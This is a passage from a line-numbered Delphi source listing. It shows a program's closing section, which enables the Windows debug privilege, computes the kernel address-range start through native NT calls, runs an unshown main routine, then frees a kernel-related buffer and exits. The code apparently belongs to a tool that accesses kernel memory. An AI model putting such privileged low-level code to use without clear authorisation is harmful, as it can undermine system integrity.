(Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE) = STATUS_SUCCESS) then 524 | begin 525 | if (ZwQuerySystemInformation(SystemBasicInformation, @sysinfo, sizeof(SYSTEM_BASIC_INFORMATION), nil) = STATUS_SUCCESS) then 526 | begin 527 | MmSystemRangeStart := 1 + sysinfo.HighestUserAddress div $100000; 528 | MmSystemRangeStart := MmSystemRangeStart * $100000; 529 | end else MmSystemRangeStart := $80000000; 530 | 531 | main(); 532 | 533 | ShowMessage('Bye (^.^)', MB_OK); 534 | 535 | bytesIO := 0; 536 | ZwFreeVirtualMemory(NtCurrentProcess, @pntkernel, @bytesIO, MEM_RELEASE); 537 | end; 538 | end; 539 | ZwTerminateProcess(DWORD(-1), 0); 540 | end. 541 | 542 | --------------------------------------------------------------------------------